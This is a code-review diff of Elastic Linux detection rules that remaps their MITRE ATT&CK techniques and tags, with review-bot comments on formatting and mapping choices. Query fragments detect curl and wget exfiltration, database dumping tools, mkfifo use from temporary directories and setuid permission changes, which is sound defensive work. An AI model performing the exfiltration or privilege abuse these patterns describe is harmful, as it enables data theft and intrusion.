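Review bot: `reference = "https://attack.mitre.org/techniques/T1057/"` is immediately followed by the `[[rule.threat.technique]]` header for T1082 with no blank line, while every other technique block added in this hunk is separated from the next by one; add a blank line after the T1057 `reference`. The same missing separator is in `execution_suspicious_mkfifo_execution.toml` later in this diff, where `reference = "https://attack.mitre.org/techniques/T1559/"` runs straight into `[rule.threat.tactic]`. Both files parse either way, so this is purely about keeping the threat blocks visually consistent with the rest of the set.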
@@ -2,7 +2,7 @@
 creation_date = "2023/02/08"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -77,17 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -107,16 +97,29 @@ file where host.os.type == "linux" and event.type == "creation" and event.action
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1496"
+name = "Resource Hijacking"
+reference = "https://attack.mitre.org/techniques/T1496/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
 [[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+id = "T1543.002"
+name = "Systemd Service"
+reference = "https://attack.mitre.org/techniques/T1543/002/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/execution_suspicious_mkfifo_execution.toml b/rules/linux/execution_suspicious_mkfifo_execution.toml
index 2db8e46b29d..1d324c1339f 100644
--- a/rules/linux/execution_suspicious_mkfifo_execution.toml
+++ b/rules/linux/execution_suspicious_mkfifo_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -84,17 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -106,11 +96,6 @@ process.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not (/*fifo* or /var/tmp/ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -121,19 +106,15 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] 
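Review bot: In the threat hunk of execution_suspicious_mkfifo_execution.toml the new `[rule.threat.tactic]` table is appended straight after `+reference = "https://attack.mitre.org/techniques/T1559/"` with no blank line between the two tables, and `[rule.new_terms]` then follows the tactic block the same way, while every other table in the file is blank-line separated and the regenerated blocks elsewhere in this patch add the separator (`+` blank before `[rule.threat.tactic]`). The same unseparated tactic table appears in execution_unusual_kthreadd_execution.toml, in initial_access_first_time_public_key_authentication.toml, initial_access_successful_ssh_authentication_by_unusual_ip.toml and initial_access_successful_ssh_authentication_by_unusual_user.toml, and in initial_access_telnet_auth_bypass_via_user_envar.toml, where the separator line is explicitly deleted. TOML does not care, but the mixed layout suggests these blocks were hand-edited after the writer that collapsed the `tags` arrays ran; re-running that writer over the touched rules would make the threat tables come out uniformly.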
diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml index a35ae4ec714..7fcc1c718a0 100644 --- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml +++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,21 +58,7 @@ This rule flags pods or containers started via orchestration or runtime tools th risk_score = 47 rule_id = "c595363f-52a6-49e1-9257-0e08ae043dbd" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -117,17 +103,9 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1053" diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml index c9804ea2744..a9a9dab2bc1 100644 --- a/rules/linux/execution_system_binary_file_permission_change.toml +++ b/rules/linux/execution_system_binary_file_permission_change.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
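Review bot: In execution_suspicious_pod_or_container_creation_command_execution.toml, `T1037 Boot or Logon Initialization Scripts` is inserted into the threat entry that previously held only `T1053`, and the `[rule.threat.tactic]` table that now governs both lies below the end of the hunk, so its value is not visible here; since the `Tactic: Privilege Escalation` tag and the `TA0004` entry are dropped, that table has to be the Persistence one for the retained tags and the tactic tables to agree, which is worth confirming. It is also worth a second look at whether T1037 is the intended replacement: the removed `T1611 Escape to Host` described container escape specifically, and nothing in the new mapping represents that aspect of the rule any more.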
@@ -117,11 +110,16 @@ process.args in ("4755", "755", "000", "777", "444", "+x") and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml index 52cc47e2b35..ea6f456d2d8 100644 --- a/rules/linux/execution_tc_bpf_filter.toml +++ b/rules/linux/execution_tc_bpf_filter.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -90,19 +90,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: TripleCross", - "Data Source: Auditd Manager", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: TripleCross", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -116,16 +104,16 @@ not ?process.parent.executable == "/usr/sbin/libvirtd" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1562.004" +name = "Disable or Modify System Firewall" +reference = "https://attack.mitre.org/techniques/T1562/004/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml index 6c81fd12cc5..a12234501a0 100644 
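Review bot: The new sub-technique in execution_tc_bpf_filter.toml, `T1562.004 Disable or Modify System Firewall`, does not obviously describe what this rule detects: the file name and the retained `Threat: TripleCross` tag suggest a BPF program attached via `tc` to hook traffic, not firewall rules being turned off, so the parent `T1562 Impair Defenses` alone, or `T1014 Rootkit` as used for the kthreadd rule in this same patch, may be the more defensible mapping — one for the rule author to confirm. Separately, the flattened tags put `"Threat: TripleCross"` before `"Tactic: Defense Evasion"`, whereas every other rule in the patch lists its Tactic tags directly after `"Use Case: Threat Detection"`; `..., "Use Case: Threat Detection", "Tactic: Defense Evasion", "Threat: TripleCross", ...` would keep the tag layout consistent across files.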
--- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml +++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,20 +100,14 @@ event.category:process and host.os.type:linux and auditd.data.syscall:mprotect a framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml index fb453b1a848..10ee7be4397 100644 --- a/rules/linux/execution_unusual_kthreadd_execution.toml +++ b/rules/linux/execution_unusual_kthreadd_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -117,21 +109,33 @@ process.command_line:( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml index 7c4599b99b1..f5547ab6045 100644 --- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml +++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -45,15 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -113,33 +105,19 @@ In Linux environments, shell processes like bash or zsh execute commands, often framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml index 0b613bb5b67..a08462182ae 100644 
--- a/rules/linux/execution_unusual_pkexec_execution.toml +++ b/rules/linux/execution_unusual_pkexec_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,17 +94,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -125,28 +115,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.command_line"] diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml index d26ede83d7b..eba84332571 100644 --- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
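Review bot: execution_unusual_pkexec_execution.toml maps to `T1548 Abuse Elevation Control Mechanism` at the parent level, whereas the other rules in this patch pick the Linux-specific sub-technique where one exists (T1222.002, T1562.004, T1574.007, T1021.004). pkexec is a setuid helper, so if the rule's intent is abuse of that mechanism the `Setuid and Setgid` sub-technique (T1548.001) is the matching entry, while if the intent is catching exploitation of pkexec itself an exploitation-for-privilege-escalation technique would be more accurate; either way the choice deserves a one-line rationale in the PR so the next remap does not flip it again. The enclosing `[[rule.threat]]` entry starts above the hunk.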
@@ -113,12 +113,17 @@ process.name == "curl" and ?process.parent.executable != null and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml index 89aa348f4dd..6f2664a7726 100644 --- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml +++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -124,6 +124,11 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1030" +name = "Data Transfer Size Limits" +reference = "https://attack.mitre.org/techniques/T1030/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml index c09a96d5d71..4df9e8bea27 100644 --- a/rules/linux/exfiltration_potential_database_dumping.toml 
+++ b/rules/linux/exfiltration_potential_database_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/13" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -51,16 +51,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -72,12 +63,12 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml index e0f16b19169..d978c2aee6c 100644 --- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml 
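Review bot: exfiltration_potential_database_dumping.toml gets `updated_date = "2026/03/24"` while every other rule touched by this patch, and the commit itself, uses `2026/03/23`; unless the file was deliberately revisited a day later this looks like a typo and should read `+updated_date = "2026/03/23"`. The re-mapping itself is consistent — the `Tactic: Collection` tag matches the new `TA0009` table and `T1213 Data from Information Repositories` fits a dump of database contents — but the file keeps its `exfiltration_` prefix although it no longer maps to Exfiltration, and the same now holds for impact_potential_bruteforce_malware_infection.toml (now Credential Access only) and for several execution_* rules that now map to Defense Evasion, Persistence or Privilege Escalation. If the prefix is meant to name the lead tactic, a follow-up rename is wanted; if it is historical only, saying so in the PR description avoids the question being re-raised.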
+++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,12 +122,12 @@ process.name == "wget" and ?process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml index f6d821c4711..1e50445591e 100644 --- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml +++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -80,15 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -171,15 +163,12 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml index 2336a398314..f6ef7c656b6 100644 --- a/rules/linux/impact_memory_swap_modification.toml +++ b/rules/linux/impact_memory_swap_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -81,18 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,21 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1496/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = 